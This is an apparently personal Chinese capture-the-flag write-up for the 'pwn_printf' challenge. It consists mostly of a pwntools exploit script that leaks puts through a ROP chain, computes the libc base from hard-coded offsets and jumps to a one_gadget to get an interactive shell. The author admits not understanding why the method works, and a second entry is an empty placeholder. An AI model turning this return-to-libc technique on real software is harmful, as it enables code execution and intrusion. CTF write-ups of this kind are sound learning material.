pwn_printf
这题属实给我吓着了,一堆字符串
说是google ctf的原题改编而来,我还特意去b站Nep那找这题的讲解,我看得懂个锤子……
反正看了别人wp说是输入16次0x20就能直接进入sub_4007C6函数,可以直接溢出然后ROP
但是至今没有搞清楚原理
后续补吧……
exp
#!/usr/bin/env python
#coding=utf-8
from pwn import*
import sys
context.log_level = 'debug'
context.terminal = ['terminator','-x','sh','-c']
binary = './pwn_printf'
local = 1
if local == 1:
p=process(binary)
else:
p=remote("",)
elf=ELF(binary)
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rdi_ret = 0x0000000000401213
def exp():
p.recvuntil('interesting\n')
for i in range(16):
p.sendline("32")
payload = 'a'*8+p64(pop_rdi_ret)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(pop_rdi_ret)+p64(0x20)+p64(0x4007C6)
p.send(payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base = puts_addr - 0x6f6a0
log.success("libc_base==>" + hex(libc_base))
one_gadget = libc_base + 0xf0364
p.sendline('a'*8+p64(one_gadget))
p.interactive()
exp()blend_pwn
咕咕咕
